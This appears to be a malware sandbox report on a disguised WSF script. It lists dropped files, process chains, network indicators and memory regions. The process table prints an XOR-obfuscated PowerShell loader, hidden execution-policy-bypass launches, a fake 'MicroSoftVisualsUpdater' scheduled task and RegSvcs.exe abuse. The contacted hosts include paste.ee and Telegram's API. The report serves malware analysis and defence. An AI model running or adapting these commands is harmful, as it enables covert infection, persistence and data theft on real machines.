Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
reported_account_violation-pdf-67223451.wsf
|
HTML document, Non-ISO extended-ASCII text, with very long lines (824), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05rmph5p.sew.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zckycxw.pco.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o12vdpc0.3kk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opc1vwie.0b3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qtduaiic.z0s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_renwvfsz.dr5.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit(
',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO"
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "MSFT_ScheduledTask (TaskName = "MicroSoftVisualsUpdater", TaskPath
= "\")"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ALBANIAH3CKER.WORK.GD
|
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
ALBANIAH3CKER.WORK.GD
|
94.198.50.33
|
|
|
|
api.telegram.org
|
149.154.167.220
|
|
|
|
api.ipify.org
|
104.26.13.205
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.198.50.33
|
ALBANIAH3CKER.WORK.GD
|
Russian Federation
|
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
28D1000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
295AE83B000
|
heap
|
page read and write
|
||
|
5A72000
|
heap
|
page read and write
|
||
|
DA26AFD000
|
stack
|
page read and write
|
||
|
275A3C00000
|
heap
|
page read and write
|
||
|
295AEA2E000
|
heap
|
page read and write
|
||
|
5539000
|
trusted library allocation
|
page read and write
|
||
|
F96000
|
heap
|
page read and write
|
||
|
50CE000
|
stack
|
page read and write
|
||
|
5DFE000
|
stack
|
page read and write
|
||
|
5A63000
|
heap
|
page read and write
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
1015000
|
heap
|
page read and write
|
||
|
38D1000
|
trusted library allocation
|
page read and write
|
||
|
FFA9AFE000
|
stack
|
page read and write
|
||
|
7C10DFF000
|
stack
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
5150000
|
heap
|
page execute and read and write
|
||
|
2BACF230000
|
heap
|
page read and write
|
||
|
5C7D000
|
stack
|
page read and write
|
||
|
2BACF4EE000
|
heap
|
page read and write
|
||
|
607C000
|
stack
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
4A6E000
|
stack
|
page read and write
|
||
|
1220000
|
trusted library allocation
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
5540000
|
heap
|
page read and write
|
||
|
2BB1000
|
trusted library allocation
|
page read and write
|
||
|
295AEA00000
|
heap
|
page read and write
|
||
|
11C0000
|
trusted library allocation
|
page read and write
|
||
|
11E0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
2BAD11AE000
|
heap
|
page read and write
|
||
|
28CE000
|
stack
|
page read and write
|
||
|
D3E000
|
stack
|
page read and write
|
||
|
4D4E000
|
stack
|
page read and write
|
||
|
FFA9CFB000
|
stack
|
page read and write
|
||
|
CA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
11D0000
|
trusted library allocation
|
page read and write
|
||
|
B20000
|
heap
|
page read and write
|
||
|
7C10EFB000
|
stack
|
page read and write
|
||
|
2BACF4EE000
|
heap
|
page read and write
|
||
|
9D0000
|
heap
|
page read and write
|
||
|
513E000
|
stack
|
page read and write
|
||
|
1020000
|
heap
|
page read and write
|
||
|
FFA93FE000
|
stack
|
page read and write
|
||
|
2BAD11A0000
|
heap
|
page read and write
|
||
|
FFA96FF000
|
stack
|
page read and write
|
||
|
5CBC000
|
stack
|
page read and write
|
||
|
CDB000
|
trusted library allocation
|
page execute and read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
295AE9E0000
|
heap
|
page read and write
|
||
|
C07000
|
heap
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
1200000
|
trusted library allocation
|
page read and write
|
||
|
275A3F2E000
|
heap
|
page read and write
|
||
|
2BACF4EE000
|
heap
|
page read and write
|
||
|
2B6E000
|
stack
|
page read and write
|
||
|
CAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
583D000
|
stack
|
page read and write
|
||
|
556E000
|
stack
|
page read and write
|
||
|
61C5000
|
trusted library allocation
|
page read and write
|
||
|
2BACF2D8000
|
heap
|
page read and write
|
||
|
B7B000
|
heap
|
page read and write
|
||
|
C3B000
|
heap
|
page read and write
|
||
|
C1B000
|
heap
|
page read and write
|
||
|
50FE000
|
stack
|
page read and write
|
||
|
57FD000
|
stack
|
page read and write
|
||
|
1210000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C108FE000
|
stack
|
page read and write
|
||
|
5120000
|
heap
|
page read and write
|
||
|
535E000
|
stack
|
page read and write
|
||
|
95B000
|
stack
|
page read and write
|
||
|
DA26DFB000
|
stack
|
page read and write
|
||
|
FD4000
|
heap
|
page read and write
|
||
|
61D0000
|
trusted library allocation
|
page read and write
|
||
|
6194000
|
trusted library allocation
|
page read and write
|
||
|
51AE000
|
stack
|
page read and write
|
||
|
3BB1000
|
trusted library allocation
|
page read and write
|
||
|
5536000
|
trusted library allocation
|
page read and write
|
||
|
7F610000
|
trusted library allocation
|
page execute and read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
FFA99FD000
|
stack
|
page read and write
|
||
|
56FE000
|
stack
|
page read and write
|
||
|
FFA97FF000
|
stack
|
page read and write
|
||
|
D7E000
|
stack
|
page read and write
|
||
|
FB8000
|
heap
|
page read and write
|
||
|
2B1F000
|
stack
|
page read and write
|
||
|
275A3BA0000
|
heap
|
page read and write
|
||
|
2BAD11AE000
|
heap
|
page read and write
|
||
|
5A3D000
|
stack
|
page read and write
|
||
|
B6F000
|
heap
|
page read and write
|
||
|
C8E000
|
stack
|
page read and write
|
||
|
FFA9BFF000
|
stack
|
page read and write
|
||
|
9F0000
|
heap
|
page read and write
|
||
|
5EFD000
|
stack
|
page read and write
|
||
|
48D8000
|
trusted library allocation
|
page read and write
|
||
|
C90000
|
trusted library allocation
|
page read and write
|
||
|
54D0000
|
heap
|
page read and write
|
||
|
CB0000
|
trusted library allocation
|
page read and write
|
||
|
2BACF4E8000
|
heap
|
page read and write
|
||
|
62D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
BC1000
|
heap
|
page read and write
|
||
|
295AE810000
|
heap
|
page read and write
|
||
|
275A3F25000
|
heap
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
2BAD11AE000
|
heap
|
page read and write
|
||
|
275A3BD5000
|
heap
|
page read and write
|
||
|
516E000
|
stack
|
page read and write
|
||
|
7C109FE000
|
stack
|
page read and write
|
||
|
7C104FA000
|
stack
|
page read and write
|
||
|
DA266FF000
|
stack
|
page read and write
|
||
|
DA26CFF000
|
stack
|
page read and write
|
||
|
2B20000
|
heap
|
page execute and read and write
|
||
|
F70000
|
trusted library allocation
|
page read and write
|
||
|
275A3B70000
|
heap
|
page read and write
|
||
|
DC0000
|
heap
|
page read and write
|
||
|
275A3F20000
|
heap
|
page read and write
|
||
|
5530000
|
trusted library allocation
|
page read and write
|
||
|
11E7000
|
trusted library allocation
|
page execute and read and write
|
||
|
50B9000
|
stack
|
page read and write
|
||
|
FE8000
|
heap
|
page read and write
|
||
|
2BACF4EA000
|
heap
|
page read and write
|
||
|
2BAD11A4000
|
heap
|
page read and write
|
||
|
FFA92FA000
|
stack
|
page read and write
|
||
|
F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
CA0000
|
trusted library allocation
|
page read and write
|
||
|
CD7000
|
trusted library allocation
|
page execute and read and write
|
||
|
85B000
|
stack
|
page read and write
|
||
|
552E000
|
trusted library allocation
|
page read and write
|
||
|
11B4000
|
trusted library allocation
|
page read and write
|
||
|
DA26BFE000
|
stack
|
page read and write
|
||
|
295B0230000
|
heap
|
page read and write
|
||
|
F0E000
|
stack
|
page read and write
|
||
|
2BACF4EE000
|
heap
|
page read and write
|
||
|
CB3000
|
trusted library allocation
|
page read and write
|
||
|
2BACF258000
|
heap
|
page read and write
|
||
|
DA268FE000
|
stack
|
page read and write
|
||
|
11DA000
|
trusted library allocation
|
page execute and read and write
|
||
|
277C000
|
stack
|
page read and write
|
||
|
2BBF000
|
trusted library allocation
|
page read and write
|
||
|
587F000
|
stack
|
page read and write
|
||
|
11EB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BACF2C5000
|
heap
|
page read and write
|
||
|
7C105FE000
|
stack
|
page read and write
|
||
|
5A67000
|
heap
|
page read and write
|
||
|
2BAD0E50000
|
heap
|
page read and write
|
||
|
CC2000
|
trusted library allocation
|
page read and write
|
||
|
525E000
|
stack
|
page read and write
|
||
|
2A1E000
|
stack
|
page read and write
|
||
|
536E000
|
stack
|
page read and write
|
||
|
510E000
|
stack
|
page read and write
|
||
|
5B7C000
|
stack
|
page read and write
|
||
|
295AE800000
|
heap
|
page read and write
|
||
|
275A3D70000
|
heap
|
page read and write
|
||
|
11D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
4EAD000
|
stack
|
page read and write
|
||
|
101E000
|
heap
|
page read and write
|
||
|
CC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
5DBE000
|
stack
|
page read and write
|
||
|
CF0000
|
trusted library allocation
|
page read and write
|
||
|
11C4000
|
trusted library allocation
|
page read and write
|
||
|
6180000
|
heap
|
page read and write
|
||
|
4ED3000
|
heap
|
page read and write
|
||
|
58BE000
|
stack
|
page read and write
|
||
|
CA4000
|
trusted library allocation
|
page read and write
|
||
|
DA267FE000
|
stack
|
page read and write
|
||
|
275A3B60000
|
heap
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
295AE847000
|
heap
|
page read and write
|
||
|
2B75000
|
trusted library allocation
|
page read and write
|
||
|
2B70000
|
trusted library allocation
|
page read and write
|
||
|
275A5670000
|
heap
|
page read and write
|
||
|
61E0000
|
trusted library allocation
|
page read and write
|
||
|
593C000
|
stack
|
page read and write
|
||
|
11AE000
|
stack
|
page read and write
|
||
|
FA0000
|
trusted library allocation
|
page read and write
|
||
|
CF7000
|
stack
|
page read and write
|
||
|
AD0000
|
heap
|
page read and write
|
||
|
2BACF210000
|
heap
|
page read and write
|
||
|
27BE000
|
stack
|
page read and write
|
||
|
F4E000
|
stack
|
page read and write
|
||
|
4FBC000
|
stack
|
page read and write
|
||
|
27C0000
|
heap
|
page execute and read and write
|
||
|
B74000
|
heap
|
page read and write
|
||
|
D07000
|
heap
|
page read and write
|
||
|
54F0000
|
heap
|
page read and write
|
||
|
F9E000
|
stack
|
page read and write
|
||
|
957000
|
stack
|
page read and write
|
||
|
617E000
|
stack
|
page read and write
|
||
|
2BAD11A4000
|
heap
|
page read and write
|
||
|
DA26199000
|
stack
|
page read and write
|
||
|
B1E000
|
stack
|
page read and write
|
||
|
2BACF200000
|
heap
|
page read and write
|
||
|
295AEA20000
|
heap
|
page read and write
|
||
|
566E000
|
stack
|
page read and write
|
||
|
2BACF4E5000
|
heap
|
page read and write
|
||
|
51C0000
|
heap
|
page execute and read and write
|
||
|
295AE818000
|
heap
|
page read and write
|
||
|
AD5000
|
heap
|
page read and write
|
||
|
295AEA25000
|
heap
|
page read and write
|
||
|
F90000
|
heap
|
page read and write
|
||
|
7C10BFD000
|
stack
|
page read and write
|
||
|
BF1000
|
heap
|
page read and write
|
||
|
B88000
|
heap
|
page read and write
|
||
|
2BACF4E0000
|
heap
|
page read and write
|
||
|
38D9000
|
trusted library allocation
|
page read and write
|
||
|
F80000
|
trusted library allocation
|
page read and write
|
||
|
2BACF250000
|
heap
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
B58000
|
heap
|
page read and write
|
||
|
DC5000
|
heap
|
page read and write
|
||
|
1230000
|
heap
|
page read and write
|
||
|
7C10CFE000
|
stack
|
page read and write
|
||
|
5A40000
|
heap
|
page read and write
|
||
|
11B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
546E000
|
stack
|
page read and write
|
||
|
2BAD11A1000
|
heap
|
page read and write
|
||
|
58FE000
|
stack
|
page read and write
|
||
|
CCA000
|
trusted library allocation
|
page execute and read and write
|
||
|
CC0000
|
trusted library allocation
|
page read and write
|
||
|
2BACF2E5000
|
heap
|
page read and write
|
||
|
2BAD11AA000
|
heap
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
FDB000
|
heap
|
page read and write
|
||
|
C46000
|
heap
|
page read and write
|
||
|
FFA94FE000
|
stack
|
page read and write
|
||
|
295AE872000
|
heap
|
page read and write
|
||
|
E0E000
|
stack
|
page read and write
|
||
|
DA264FE000
|
stack
|
page read and write
|
||
|
295AE8A1000
|
heap
|
page read and write
|
||
|
7C106FE000
|
stack
|
page read and write
|
||
|
B86000
|
heap
|
page read and write
|
||
|
2BACF291000
|
heap
|
page read and write
|
There are 226 hidden memdumps, click here to show them.